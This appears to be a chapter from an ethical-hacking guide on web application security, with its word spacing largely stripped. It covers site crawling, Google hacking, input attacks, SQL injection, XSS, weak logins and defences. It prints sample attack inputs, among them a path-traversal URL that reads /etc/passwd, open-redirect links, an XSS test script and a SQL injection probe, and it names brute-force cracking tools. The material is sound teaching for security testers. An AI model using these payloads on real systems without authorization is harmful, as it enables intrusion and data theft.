CrawlersAspiderprogram,suchasthefreeHTTrackWebsiteCopier(https://httrack.com),cancrawlyoursitetolookforeverypubliclyaccessiblefile.TouseHTTrack,simplyloadit,giveyourprojectaname,tellHTTrackwhichwebsite(s)tomirror,andafterafewminutes,possiblyhours(dependingonthesizeandcomplexityofthesite),you’llhaveeverythingthat’spubliclyaccessibleonthesitestoredonyourlocaldriveinc:\MyWebSites.Figure15-1showsthecrawloutputofabasicwebsite.
Figure15-1:UsingHTTracktocrawlawebsite.
Complicatedsitesoftenrevealalotmoreinformationthatshouldnotbethere,includingolddatafilesandevenapplicationscriptsandsourcecode.
Inevitably,whenperformingwebsecurityassessments,Istumbleacross.zipor.rarfilesonwebservers.Sometimestheycontainjunk,butoftentimestheyholdsensitiveinformationthatshouldn’tbethereforthepublictoaccess.Oneprojectinparticularstandsout.WhenIranacrossa.zipfileandtriedtoopenit,WinZipaskedmeforapassword.Usingmyhandydandy.zipfilepassword-crackingtoolfromElcomSoft(seeChapter8fordetailsonpasswordcracking),Ihadthepasswordinmeremilliseconds.Insidethe.zipfilewasanExcelspreadsheetcontainingsensitivepatienthealthcareinformation(names,addresses,SocialSecuritynumbers,andmore)thatanyoneandeveryoneintheworldcouldaccess.Insituationslikethis,yourbusinessmightberequiredtonotifyeveryoneinvolvedthattheirinformationwasinadequatelyprotectedandpossiblycompromised.Itpaystoknowthelawsandregulationsaffectingyourbusiness.Betteryet,makesureusersaren’tpostingimproperlysecuredsensitiveinformationonyourwebserversinthefirstplace!
Lookattheoutputofyourcrawlingprogramtoseewhatfilesareavailable.RegularHTMLandPDFfilesareprobablyokaybecausethey’remostlikelyneededfornormalwebusage.Butitwouldn’thurttoopeneachfiletomakesureitbelongsthereanddoesn’tcontainsensitiveinformationyoudon’twanttosharewiththeworld.
GoogleGoogle,thesearchenginecompanythatmanylovetohate,canalsobeusedfor
directorytraversal.Infact,Google’sadvancedqueriesaresopowerfulthatyoucanusethemtorootoutsensitiveinformation,criticalwebserverfilesanddirectories,creditcardnumbers,webcams—basicallyanythingthatGooglehasdiscoveredonyoursite—withouthavingtomirroryoursiteandsiftthrougheverythingmanually.It’salreadysittingthereinGoogle’scachewaitingtobeviewed.
ThefollowingareacoupleofadvancedGooglequeriesthatyoucanenterdirectlyintotheGooglesearchfield:
site:hostnamekeywords—Thisquerysearchesforanykeywordyoulist,suchasSSN,confidential,creditcard,andsoon.Anexamplewouldbe:
site:www.principlelogic.comspeaker
filetype:file-extensionsite:hostname—Thisquerysearchesforspecificfiletypesonaspecificwebsite,suchasdoc,pdf,db,dbf,zip,andmore.Thesefiletypesmightcontainsensitiveinformation.Anexamplewouldbe:
filetype:pdfsite:www.principlelogic.com
OtheradvancedGoogleoperatorsincludethefollowing:
allintitlesearchesforkeywordsinthetitleofawebpage.inurlsearchesforkeywordsintheURLofawebpage.relatedfindspagessimilartothiswebpage.linkshowsothersitesthatlinktothiswebpage.
Specificdefinitionsandmorecanbefoundatwww.googleguide.com/advanced_operators.html.ManywebvulnerabilityscannersalsoperformchecksagainsttheGoogleHackingDatabase(GHDB)sitewww.exploit-db.com/google-hacking-database.
WhensiftingthroughyoursitewithGoogle,besuretolookforsensitiveinformationaboutyourservers,network,andorganizationinGoogleGroups(http://groups.google.com),whichistheUsenetarchive.Ihavefoundemployeepostingsinnewsgroupsthatrevealtoomuchabouttheinternalnetworkandbusinesssystems—theskyisthelimit.Ifyoufindsomethingthatdoesn’tneedtobethere,youcanworkwithGoogletohaveiteditedorremoved.Formoreinformation,refertoGoogle’sContactuspageatwww.google.com/intl/en/contact.
Lookingatthebiggerpictureofwebsecurity,Googlehackingisprettylimited,butifyou’rereallyintoit,checkoutJohnnyLong’sbook,GoogleHackingforPenetrationTesters(Syngress).
Countermeasuresagainstdirectorytraversals
Youcanemploythreemaincountermeasuresagainsthavingfilescompromisedviamaliciousdirectorytraversals:
Don’tstoreold,sensitive,orotherwisenonpublicfilesonyourwebserver.Theonlyfilesthatshouldbeinyour/htdocsorDocumentRootfolderarethosethatareneededforthesitetofunctionproperly.Thesefilesshouldnotcontainconfidentialinformationthatyoudon’twanttheworldtosee.Configureyourrobots.txtfiletopreventsearchengines,suchasGoogle,fromcrawlingthemoresensitiveareasofyoursite.
Ensurethatyourwebserverisproperlyconfiguredtoallowpublicaccesstoonlythosedirectoriesthatareneededforthesitetofunction.Minimumprivilegesarekeyhere,soprovideaccesstoonlythefilesanddirectoriesneededforthewebapplicationtoperformproperly.
Checkyourwebserver’sdocumentationforinstructionsoncontrollingpublicaccess.Dependingonyourwebserverversion,theseaccesscontrolsaresetin
Thehttpd.conffileandthe.htaccessfilesforApache(Seehttp://httpd.apache.org/docs/current/configuring.htmlformoreinformation.)InternetInformationServicesManagerforIIS
Thelatestversionsofthesewebservershavegooddirectorysecuritybydefaultso,ifpossible,makesureyou’rerunningthelatestversions.
Finally,considerusingasearchenginehoneypot,suchastheGoogleHackHoneypot(http://ghh.sourceforge.net).Ahoneypotdrawsinmalicioususerssoyoucanseehowthebadguysareworkingagainstyoursite.Then,youcanusetheknowledgeyougaintokeepthematbay.
Input-filteringattacksWebsitesandapplicationsarenotoriousfortakingpracticallyanytypeofinput,mistakenlyassumingthatit’svalid,andprocessingitfurther.Notvalidatinginputisoneofthegreatestmistakesthatwebdeveloperscanmake.
Severalattacksthatinsertmalformeddata—often,toomuchatonetime—canberunagainstawebsiteorapplication,whichcanconfusethesystemandmakeitdivulgetoomuchinformationtotheattacker.Inputattackscanalsomakeiteasyforthebadguystogleansensitiveinformationfromthewebbrowsersofunsuspectingusers.
BufferoverflowsOneofthemostseriousinputattacksisabufferoverflowthatspecificallytargetsinputfieldsinwebapplications.
Forinstance,acredit-reportingapplicationmightauthenticateusersbeforethey’reallowedtosubmitdataorpullreports.TheloginformusesthefollowingcodetograbuserIDswithamaximuminputof12characters,asdenotedbythemaxsizevariable:
<formname="Webauthenticate"action="www.your_web_app.com/
login.cgi"method="POST">
…
<inputtype="text"name="inputname"maxsize="12">
…
Atypicalloginsessionwouldinvolveavalidloginnameof12charactersorfewer.However,themaxsizevariablecanbechangedtosomethinghuge,suchas100oreven1,000.Thenanattackercanenterbogusdataintheloginfield.Whathappensnextisanyone’scall—theapplicationmighthang,overwriteotherdatainmemory,orcrashtheserver.
Asimplewaytomanipulatesuchavariableistostepthroughthepagesubmissionbyusingawebproxy,suchasthosebuiltintothecommercialwebvulnerabilityscannersImentionorthefreeBurpProxy(https://portswigger.net/burp/proxy.html).
Webproxiessitbetweenyourwebbrowserandtheserveryou’retestingandallowyoutomanipulateinformationsenttotheserver.Tobegin,youmustconfigureyourwebbrowsertousethelocalproxyof127.0.0.1onport8080.ToaccessthisinFirefox,chooseOptions,clickAdvanced,clicktheNetworktab,clicktheConnectionSettingsbutton,andthenselecttheManualProxyConfigurationradiobutton.InInternetExplorer,choosetheGearicon ⇒ InternetOptions,thenclicktheLANSettingsbuttonunderConnections,selecttheUseaproxyserverforyourLANradiobutton,andentertheappropriatehostname/IPaddressandportnumber.
Allyouhavetodoischangethefieldlengthofthevariablebeforeyourbrowsersubmitsthepage,anditwillbesubmittedusingwhateverlengthyougive.YoucanalsousetheWebDevelopertoremovemaximumformlengthsdefinedinwebforms,asshowninFigure15-2.
Figure15-2:UsingFirefoxWebDevelopertoresetformfieldlengths.
URLmanipulationAnautomatedinputattackmanipulatesaURLandsendsitbacktotheserver,tellingthewebapplicationtodovariousthings,suchasredirecttothird-partysites,loadsensitivefilesofftheserver,andsoon.Localfileinclusionisonesuchvulnerability.ThisiswhenthewebapplicationacceptsURL-basedinputandreturnsthespecifiedfile’scontentstotheusersuchasinthefollowingexampleofanattemptedbreachofaLinuxserver’spasswdfile:
https://www.your_web_app.com/onlineserv/Checkout.cgi?state=
detail&language=english&imageSet=/../..//../..//../..//../
..///etc/passwd
It’simportanttonotethatmostrecentapplicationplatformssuchasASP.NETandJavaareprettygoodaboutnotallowingsuchmanipulationoftheURLvariables,butIdostillseethisvulnerabilityperiodically.
ThefollowinglinksdemonstrateanotherexampleofURLtrickerycalledURLredirection:
http://www.your_web_app.com/error.aspx?URL=http://www.
bad~site.com&ERROR=Path+’OPTIONS’+is+forbidden.
http://www.your_web_app.com/exit.asp?URL=http://www.
bad~site.com
Inbothsituations,anattackercanexploitthisvulnerabilitybysendingthelinktounsuspectingusersviae-mailorbypostingitonawebsite.Whenusersclickthelink,theycanberedirectedtoamaliciousthird-partysitecontainingmalwareorinappropriatematerial.
Ifyouhavenothingbuttimeonyourhands,youmightuncoverthesetypesofvulnerabilitiesmanually.However,intheinterestofaccuracy(andsanity),theseattacksarebestcarriedoutbyrunningawebvulnerabilityscannerbecausetheycandetecttheweaknessbysendinghundredsandhundredsofURLiterationstothewebsystemveryquickly.
HiddenfieldmanipulationSomewebsitesandapplicationsembedhiddenfieldswithinwebpagestopassstateinformationbetweenthewebserverandthebrowser.Hiddenfieldsarerepresentedinawebformas<inputtype=“hidden”>.Becauseofpoorcodingpractices,hiddenfieldsoftencontainconfidentialinformation(suchasproductpricesonane-commercesite)thatshouldbestoredonlyinaback-enddatabase.Usersshouldn’tseehiddenfields—hencethename—butthecuriousattackercandiscoverandexploitthemwiththesesteps:
1. ViewtheHTMLsourcecode.
ToseethesourcecodeinInternetExplorerandFirefox,youcanusuallyright-clickonthepageandselectViewsourceorViewPageSource.
2. Changetheinformationstoredinthesefields.
Forexample,amalicioususermightchangethepricefrom$100to$10.
3. Repostthepagebacktotheserver.
Thisstepallowstheattackertoobtainill-gottengains,suchasalowerpriceonawebpurchase.
Suchvulnerabilitiesarebecomingrare,butlikeURLmanipulation,thepossibilityexistssoitpaystokeepaneyeout.
Usinghiddenfieldsforauthentication(login)mechanismscanbeespeciallydangerous.Ioncecameacrossamultifactorauthenticationintruderlockoutprocessthatreliedonahiddenfieldtotrackthenumberoftimestheuserattemptedtologin.Thisvariablecouldberesettozeroforeachloginattemptandthusfacilitateascripteddictionaryorbrute-forceloginattack.Itwassomewhatironicthatthesecuritycontroltopreventintruderattackswasvulnerabletoanintruderattack.
Severaltools,suchastheproxiesthatcomewithcommercialwebvulnerabilityscannersorBurpProxy,caneasilymanipulatehiddenfields.Figure15-3showstheWebInspectSPIProxyinterfaceandawebpage’shiddenfield.
Figure15-3:UsingWebInspecttofindandmanipulatehiddenfields.
Ifyoucomeacrosshiddenfields,youcantrytomanipulatethemtoseewhatcanbedone.It’sassimpleasthat.
CodeinjectionandSQLinjectionSimilartoURLmanipulationattacks,code-injectionattacksmanipulatespecificsystemvariables.Here’sanexample:
http://www.your_web_app.com/script.php?info_variable=X
Attackerswhoseethisvariablecanstartenteringdifferentdataintotheinfo_variablefield,changingXtosomethinglikeoneofthefollowinglines:
http://www.your_web_app.com/script.php?info_variable=Y
http://www.your_web_app.com/script.php?info_variable=123XYZ
Thisisarudimentaryexamplebut,nonetheless,thewebapplicationmightrespondinawaythatgivesattackersmoreinformationthantheywant,suchasdetailederrorsoraccessintodatafieldsthey’renotauthorizedtoaccess.Theinvalidinputmightalsocausetheapplicationortheservertohang.Similartothecasestudyearlierinthe
chapter,hackerscanusethisinformationtodeterminemoreaboutthewebapplicationanditsinnerworkings,whichcanultimatelyleadtoaserioussystemcompromise.
IfHTTPvariablesarepassedintheURLandareeasilyaccessible,it’sonlyamatteroftimebeforesomeoneexploitsyourwebapplication.
Ionceusedawebapplicationtomanagesomepersonalinformationthatdidjustthis.Becausea“name”parameterwaspartoftheURL,anyonecouldgainaccesstootherpeople’spersonalinformationbychangingthe“name”value.Forexample,iftheURLincluded“name=kbeaver”,asimplechangeto“name=jsmith”wouldbringupJ.Smith’shomeaddress,SocialSecuritynumber,andsoon.Ouch!Ialertedthesystemadministratortothisvulnerability.Afterafewminutesofdenial,heagreedthatitwasindeedaproblemandproceededtoworkwiththedeveloperstofixit.
Codeinjectioncanalsobecarriedoutagainstback-endSQLdatabases—anattackknownasSQLinjection.MaliciousattackersinsertSQLstatements,suchasCONNECT,SELECT,andUNION,intoURLrequeststoattempttoconnectandextractinformationfromtheSQLdatabasethatthewebapplicationinteractswith.SQLinjectionismadepossiblebyapplicationsnotproperlyvalidatinginputcombinedwithinformativeerrorsreturnedfromdatabaseserversandwebservers.
TwogeneraltypesofSQLinjectionarestandard(alsocallederror-based)andblind.Error-basedSQLinjectionisexploitedbasedonerrormessagesreturnedfromtheapplicationwheninvalidinformationisinputintothesystem.BlindSQLinjectionhappenswhenerrormessagesaredisabled,requiringthehackerorautomatedtooltoguesswhatthedatabaseisreturningandhowit’srespondingtoinjectionattacks.
There’saquick(althoughnotreliableasmuchasitusedtobe)waytodeterminewhetheryourwebapplicationisvulnerabletoSQLinjection.Simplyenterasingleapostrophe(’)inyourwebformfieldsorattheendoftheURL.IfaSQLerrorisreturned,oddsaregoodthatSQLinjectionispresent.
You’redefinitelygoingtogetwhatyoupayforwhenitcomestoscanningforanduncoveringSQLinjectionflawswithawebvulnerabilityscanner.AswithURLmanipulation,you’remuchbetteroffrunningawebvulnerabilityscannertocheckforSQLinjection,whichallowsanattackertoinjectdatabasequeriesandcommandsthroughthevulnerablepagetothebackenddatabase.Figure15-4showsnumerousSQLinjectionvulnerabilitiesdiscoveredbytheNetsparkervulnerabilityscanner.
Figure15-4:NetsparkerdiscoveredSQLinjectionvulnerabilities.
WhenyoudiscoverSQLinjectionvulnerabilities,youmightbeinclinedtostopthereandnottrytoexploittheweakness.That’sfine.However,IprefertoseehowfarIcangetintothedatabasesystem.IrecommendusinganySQLinjectioncapabilitiesbuiltintoyourwebvulnerabilityscannerifpossiblesoyoucandemonstratetheflawtomanagement.
Ifyourbudgetislimited,youmayconsiderusingafreeSQLinjectiontoolsuchasSQLPowerInjector(www.sqlpowerinjector.com)ortheFirefoxAdd-on,SQLInjectMe(https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me).
IcoverdatabasesecuritymoreindepthinChapter16.
Cross-sitescriptingCross-sitescripting(XSS)isperhapsthemostwell-known—andwidespread—webvulnerabilitythatoccurswhenawebpagedisplaysuserinput—typicallyviaJavaScript—thatisn’tproperlyvalidated.Acriminalhackercantakeadvantageoftheabsenceofinputfilteringandcauseawebpagetoexecutemaliciouscodeonanyuser’scomputerthatviewsthepage.
Forexample,anXSSattackcandisplaytheuserIDandpasswordloginpagefromanotherroguewebsite.IfusersunknowinglyentertheiruserIDsandpasswordsintheloginpage,theuserIDsandpasswordsareenteredintothehacker’swebserverlogfile.Othermaliciouscodecanbesenttoavictim’scomputerandrunwiththesame
securityprivilegesasthewebbrowserore-mailapplicationthat’sviewingitonthesystem;themaliciouscodecouldprovideahackerwithfullRead/Writeaccesstobrowsercookies,browserhistoryfiles,orevenpermitthedownload/installationofmalware.
AsimpletestshowswhetheryourwebapplicationisvulnerabletoXSS.Lookforanyfieldsintheapplicationthatacceptuserinput(suchasonaloginorsearchform),andenterthefollowingJavaScriptstatement:
<script>alert('XSS')</script>
IfawindowpopsupthatreadsXSS,asshowninFigure15-5,theapplicationisvulnerable.TheXSS-MeFirefoxAdd-on(https://addons.mozilla.org/en-US/firefox/addon/xss-me/)isanovelwaytotestforthisvulnerabilityaswell.
Figure15-5:Scriptcodereflectedtothebrowser.
TherearemanymoreiterationsforexploitingXSS,suchasthoserequiringuserinteractionviatheJavaScriptonmouseoverfunction.AswithSQLinjection,youreallyneedtouseanautomatedscannertocheckforXSS.BothNetsparkerandAcunetixWebVulnerabilityScannerdoagreatjoboffindingXSS.However,theyoftentendtofinddifferentXSSissues,adetailthathighlightstheimportanceofusingmultiplescannerswhenyoucan.Figure15-6showssomesampleXSSfindingsinAcunetixWebVulnerabilityScanner.
Figure15-6:UsingAcunetixWebVulnerabilityScannertofindcross-sitescriptinginawebapplication.
Anotherwebvulnerabilityscannerthat’sverygoodatuncoveringXSSthatmanyotherscannerswon’tfindisAppSpider(formerlyNTOSpider)fromRapid7(www.rapid7.com/products/appspider).Inmyexperience,AppSpiderworksbetterthanotherscannersatperformingauthenticatedscansagainstapplicationsthatusemulti-factorauthenticationsystems.AppSpidershoulddefinitelybeonyourradar.Neverforgetthis:Whenitcomestowebvulnerabilities,themorescannersthebetter!Ifanything,someoneelsemightendupusingoneofthescannersyoudon’tuse!
CountermeasuresagainstinputattacksWebsitesandapplicationsmustfilterincomingdata.It’sassimpleasthat.Thesitesandapplicationsmustcheckandensurethatthedataenteredfitswithintheparametersofwhattheapplicationisexpecting.Ifthedatadoesn’tmatch,theapplicationshouldgenerateanerrororreturntothepreviouspage.Undernocircumstancesshouldtheapplicationacceptthejunkdata,processit,andreflectitbacktotheuser.
Securesoftwarecodingpracticescaneliminatealltheseissuesifthey’remadeacriticalpartofthedevelopmentprocess.Developersshouldknowandimplementthesebestpractices:
Neverpresentstaticvaluesthatthewebbrowserandtheuserdon’tneedtosee.Instead,thisdatashouldbeimplementedwithinthewebapplicationontheserversideandretrievedfromadatabaseonlywhenneeded.
Filterout<script>tagsfrominputfields.Disabledetailedwebserveranddatabase-relatederrormessagesifpossible.
SensitiveinformationstoredlocallyQuiteoftenaspartofmysecuritytesting,Iuseahexeditortoseehowanapplicationisstoringsensitiveinformation,suchaspasswords,inmemory.WhenI’musingFirefoxandInternetExplorer,Icanuseahexeditor,suchasWinHex(www.x-ways.net/winhex),tosearchtheactivememoryintheseprogramsandfrequentlyfinduserIDandpasswordcombinations.
I’vefoundthatwithInternetExplorerthisinformationiskeptinmemoryevenafterbrowsingtoseveralotherwebsitesorloggingoutoftheapplication.Thismemoryusagefeatureposesasecurityriskonthelocalsystemifanotheruseraccessesthecomputerorifthesystemisinfectedwithmalwarethatcansearchsystemmemoryforsensitiveinformation.ThewaybrowsersstoresensitiveinformationinmemoryisalsobadnewsifanapplicationerrororsystemmemorydumpoccursandtheuserendsupsendingtheinformationtoMicrosoft(oranotherbrowservendor)forQApurposes.It’salsobadnewsiftheinformationiswrittentoadumpfileonthelocalharddriveandsitsthereforsomeonetofind.
Trysearchingforsensitiveinformationstoredinmemoryrelatedonyourwebapplication(s)oronstandaloneprogramsthatrequireauthentication.Youjustmightbesurprisedattheoutcome.Outsideofobfuscatingorencodingthelogincredentials,there’sunfortunatelynotagreatfixbecausethis“feature”ispartofthewebbrowserthatdeveloperscan’treallycontrol.
AsimilarsecurityfeatureoccursontheclientsidewhenHTTPGETrequestsratherthanHTTPPOSTrequestsareusedtoprocesssensitiveinformation.ThefollowingisanexampleofavulnerableGETrequest:
https://www.your_web_app.com/access.php?username=kbeaver&password=WhAteVur!&login=SoOn
GETrequestsareoftenstoredintheuser’swebbrowserhistoryfile,webserverlogfiles,andproxylogfiles.GETrequestscanbetransmittedtothird-partysitesviatheHTTPRefererfieldwhentheuserbrowsestoathird-partysite.Alloftheabovecanleadtoexposureoflogincredentialsandunauthorizedwebapplicationaccess.Thelesson:Don’tuseHTTPGETrequestsforlogins.UseHTTPPOSTrequestsinstead.Ifanything,considerthesevulnerabilitiestobeagoodreasontoencrypttheharddrivesofyourlaptopsandothercomputersthatarenotphysicallysecure!
DefaultscriptattacksPoorlywrittenwebprograms,suchasHypertextPreprocessor(PHP)andActiveServerPages(ASP)scripts,canallowhackerstoviewandmanipulatefilesonawebserveranddootherthingsthey’renotauthorizedtodo.Theseflawsarealsocommonincontentmanagementsystems(CMSs)thatareusedbydevelopers,ITstaff,andmarketingprofessionalstomaintainawebsite’scontent.Defaultscriptattacksarecommonbecausesomuchpoorlywrittencodeisfreelyaccessibleonwebsites.Hackerscanalsotakeadvantageofvarioussamplescriptsthatinstallonwebservers,especiallyolderversionsofMicrosoft’sIISwebserver.
Manywebdevelopersandwebmastersusethesescriptswithoutunderstandinghowtheyreallyworkorwithouttestingthem,whichcanintroduceserioussecurityvulnerabilities.
Totestforscriptvulnerabilities,youcanperusescriptsmanuallyoruseatextsearchtool(suchasthesearchfunctionbuiltintotheWindowsStartmenuortheFindprograminLinux)tofindanyhard-codedusernames,passwords,andothersensitiveinformation.Searchforadmin,root,user,ID,login,signon,password,pass,pwd,andsoon.Sensitiveinformationembeddedinscriptslikethisisrarelynecessaryandisoftentheresultofpoorcodingpracticesthatgiveprecedencetoconvenienceover
security.
CountermeasuresagainstdefaultscriptattacksYoucanhelppreventattacksagainstdefaultwebscriptsasfollows:
Knowhowscriptsworkbeforedeployingthemwithinawebenvironment.Makesurethatalldefaultorsamplescriptsareremovedfromthewebserverbeforeusingthem.
Keepanycontentmanagementsystemsoftwareupdated,especiallyWordPressasittendstobeabigtargetforattackers.
Don’tusepubliclyaccessiblescriptsthatcontainhard-codedconfidentialinformation.They’reasecurityincidentinthemaking.
Setfilepermissionsonsensitiveareasofyoursite/applicationtopreventpublicaccess.
UnsecuredloginmechanismsManywebsitesrequireuserstologinbeforetheycandoanythingwiththeapplication.Theseloginmechanismsoftendon’thandleincorrectuserIDsorpasswordsgracefully.TheyoftendivulgetoomuchinformationthatanattackercanusetogathervaliduserIDsandpasswords.
Totestforunsecuredloginmechanisms,browsetoyourapplicationandlogin
UsinganinvaliduserIDwithavalidpasswordUsingavaliduserIDwithaninvalidpasswordUsinganinvaliduserIDandinvalidpassword
Afteryouenterthisinformation,thewebapplicationwillprobablyrespondwithamessagesimilartoYouruserIDisinvalidorYourpasswordisinvalid.Thewebapplicationmightreturnagenericerrormessage,suchasYouruserIDandpasswordcombinationisinvalidand,atthesametime,returndifferenterrorcodesintheURLforinvaliduserIDsandinvalidpasswords,asshowninFigures15-7and15-8.
Figure15-7:URLreturnsanerrorwhenaninvaliduserIDisentered.
Figure15-8:TheURLreturnsadifferenterrorwhenaninvalidpasswordisentered.
Ineithercase,thisisbadnewsbecausetheapplicationistellingyounotonlywhichparameterisinvalid,butalsowhichoneisvalid.Thismeansthatmaliciousattackers
nowknowagoodusernameorpassword—theirworkloadhasbeencutinhalf!Iftheyknowtheusername(whichusuallyiseasiertoguess),theycansimplywriteascripttoautomatethepassword-crackingprocess,andviceversa.
Youshouldalsotakeyourlogintestingtothenextlevelbyusingaweblogincrackingtool,suchasBrutus(www.hoobie.net/brutus/index.html),asshowninFigure15-9.BrutusisaverysimpletoolthatcanbeusedtocrackbothHTTPandform-basedauthenticationmechanismsbyusingbothdictionaryandbrute-forceattacks.
Figure15-9:TheBrutustoolfortestingforweakweblogins.
Aswithanytypeofpasswordtesting,thiscanbealongandarduoustask,andyoustandtheriskoflockingoutuseraccounts.Proceedwithcaution.
Analternative—andbettermaintained—toolforcrackingwebpasswordsisTHC-Hydra(www.thc.org/thc-hydra)
Mostcommercialwebvulnerabilityscannershavedecentdictionary-basedwebpasswordcrackersbutnone(thatI’mawareof)candotruebrute-forcetestinglikeBrutuscan.AsIdiscussinChapter8,yourpassword-crackingsuccessishighlydependentonyourdictionarylists.Herearesomepopularsitesthathousedictionaryfilesandothermiscellaneouswordlists:
ftp://ftp.cerias.purdue.edu/pub/dict
http://packetstormsecurity.org/Crackers/wordlists
www.outpost9.com/files/WordLists.html
AcunetixWebVulnerabilityScannerdoesagoodjobtestingforweakpasswordsduringitsscans.I’vesuccessfullyusedthisscannertouncoverweakwebpasswordsthatIwouldn’thavefoundotherwise.Suchafindingoftenleadstofurtherpenetrationofthesystem.
Youmightnotneedapassword-crackingtoolatallbecausemanyfront-endwebsystems,suchasstoragemanagementsystemsandIPvideoandphysicalaccesscontrolsystems,simplyhavethepasswordsthatcameonthem.Thesedefaultpasswordsareusually“password,”“admin,”ornothingatall.Somepasswordsareevenembeddedrightintheloginpage’ssourcecode,suchasthenetworkcamerasourcecodeshowninlines207and208inFigure15-10.
Figure15-10:Anetworkcamera’slogincredentialsembeddeddirectlyinitsHTMLsourcecode.
CountermeasuresagainstunsecuredloginsystemsYoucanimplementthefollowingcountermeasurestopreventpeoplefromattackingweakloginsystemsinyourwebapplications:
Anyloginerrorsthatarereturnedtotheendusershouldbeasgenericaspossible,sayingsomethingsimilartoYouruserIDandpasswordcombinationisinvalid.
TheapplicationshouldneverreturnerrorcodesintheURLthatdifferentiatebetweenaninvaliduserIDandaninvalidpassword.
IfaURLmessagemustbereturned,theapplicationshouldkeepitasgenericaspossible.Here’sanexample:
www.your_web_app.com/login.cgi?success=false
ThisURLmessagemightnotbeconvenienttotheuser,butithelpshidethemechanismandthebehind-the-scenesactionsfromtheattacker.
UseCAPTCHA(alsoreCAPTCHA)orwebloginformstohelppreventpassword-crackingattempts.Employanintruderlockoutmechanismonyourwebserverorwithinyourwebapplicationstolockuseraccountsafter10–15failedloginattempts.Thischorecanbehandledviasessiontrackingorviaathird-partywebapplicationfirewalladd-onlikeIdiscussinthelatersection“Puttingupfirewalls.”Checkforandchangeanyvendordefaultpasswordstosomethingthat’seasytorememberyetdifficulttocrack.
HackingWeb2.0Newerwebtechnologies,originallydubbed“Web2.0,”havechangedhowtheInternetisused.FromYouTubetoFacebooktoTwitter,newserverandclient-sidetechnologies,suchaswebservices,Ajax,andFlash,arebeingrolledoutasifthey’regoingoutofstyle.Andthesearen’tjustconsumertechnologies.Businessesseethevalueinthem,anddevelopersareexcitedtoutilizethelatestandgreatesttechnologiesintheirenvironments.
Unfortunately,thedownsidetothesetechnologiesiscomplexity.ThesenewrichInternetapplications,asthey’realsoreferredto,aresocomplexthatdevelopers,qualityassuranceanalysts,andsecuritymanagersarestrugglingtokeepupwithalltheirassociatedsecurityissues.Don’tgetmewrong;thevulnerabilitiesinnewerapplicationsareverysimilartowhatshowupwithlegacytechnologies,suchasXSS,SQLinjection,parametermanipulation,andsoon.Youhavetoremainvigilant.
Inthemeantime,herearesomevaluabletoolsyoucanusetotestforflawsinyourWeb2.0applications:
WebDeveloper(http://chrispederick.com/work/web-developer)foranalyzingscriptcodeandperformingothermanualchecks.
WSDigger(www.mcafee.com/us/downloads/free-tools/wsdigger.aspx)foranalyzingwebservices.
WSFuzzer(www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project)foranalyzingwebservices.
TechnologiessuchasAjaxandwebservicesareheretostay,sotrytogetyourarmsaroundtheirsecurityissuesnowbeforethetechnologygrowsevenmorecomplex.
PerforminggeneralsecurityscansforwebapplicationvulnerabilitiesIwanttoreiteratethatbothautomatedandmanualtestingneedtobeperformedagainstyourwebsystems.You’renotgoingtoseethewholepicturebyrelyingonjustoneofthesemethods.Ihighlyrecommendusinganall-in-onewebapplicationvulnerabilityscannersuchasAcunetixWebVulnerabilityScannerorAppSpidertohelpyourootoutwebvulnerabilitiesthatwouldbeunreasonableifnotimpossibletofindotherwise.CombinethescannerresultswithamaliciousmindsetandthehackingtechniquesIdescribeinthischapter,andyou’reonyourwaytofindingthewebsecurityflawsthatmatter.
MinimizingWebSecurityRisksKeepingyourwebapplicationssecurerequiresongoingvigilanceinyourethicalhackingeffortsandonthepartofyourwebdevelopersandvendors.Keepupwiththelatesthacks,testingtools,andtechniquesandletyourdevelopersandvendorsknowthatsecurityneedstobeatoppriorityforyourorganization.Idiscussgettingsecuritybuy-ininChapter20.
Youcangaindirecthands-onexperiencetestingandhackingwebapplicationsbyusingthefollowingresources:
OWASPWebGoatProject(www.owasp.org/index.php/Category:OWASP_WebGoat_Project)Foundstone’sSASSHacmeTools(www.mcafee.com/us/downloads/free-tools/index.aspx)
Ihighlyrecommendedyoucheckthemoutandgetyourhandsdirty!
PracticingsecuritybyobscurityThefollowingformsofsecuritybyobscurity—hidingsomethingfromobviousviewusingtrivialmethods—canhelppreventautomatedattacksfromwormsorscriptsthatarehard-codedtoattackspecificscripttypesordefaultHTTPports:
Toprotectwebapplicationsandrelateddatabases,usedifferentmachinestoruneachwebserver,application,anddatabaseserver.
TheoperatingsystemsontheseindividualmachinesshouldbetestedforsecurityvulnerabilitiesandhardenedbasedonbestpracticesandthecountermeasuresdescribedinChapters12and13.
Usebuilt-inwebserversecurityfeaturestohandleaccesscontrolsandprocessisolation,suchastheapplication-isolationfeatureinIIS.Thispracticehelpsensurethatifonewebapplicationisattacked,itwon’tnecessarilyputanyotherapplicationsrunningonthesameserveratrisk.Useatoolforobscuringyourwebserver’sidentity—essentiallyanonymizingyourserver.AnexampleisPort80Software’sServerMask(www.port80software.com/products/servermask).Ifyou’rerunningaLinuxwebserver,useaprogramsuchasIPPersonality(http://ippersonality.sourceforge.net)tochangetheOSfingerprintsothesystemlookslikeit’srunningsomethingelse.
Changeyourwebapplicationtorunonanonstandardport.ChangefromthedefaultHTTPport80orHTTPSport443toahighportnumber,suchas8877,and,ifpossible,settheservertorunasanunprivilegeduser—thatis,somethingotherthansystem,administrator,root,andsoon.
Nevereverrelyonobscurityalone;itisn’tfoolproof.Adedicatedattackermightdeterminethatthesystemisn’twhatitclaimstobe.Still,evenwiththenaysayers,itcanbebetterthannothing.
PuttingupfirewallsConsiderusingadditionalcontrolstoprotectyourwebsystems,includingthefollowing:
Anetwork-basedfirewallorIPSthatcandetectandblockattacksagainstwebapplications.ThisincludescommercialfirewallsfromsuchcompaniesasWatchGuard(www.watchguard.com)andPaloAltoNetworks(www.paloaltonetworks.com)Ahost-basedwebapplicationIPS,suchasSecureIIS(www.eeye.com/products/secureiis-web-server-security)orServerDefender(www.port80software.com/products/serverdefender)oraWebApplicationFirewall(WAF)fromvendorssuchasBarracudaNetworks(www.barracuda.com/products/webapplicationfirewall)andFortiNet(www.fortinet.com/products/fortiweb/index.html)
Theseprogramscandetectwebapplicationandcertaindatabaseattacksinrealtimeandcutthemoffbeforetheyhaveachancetodoanyharm.
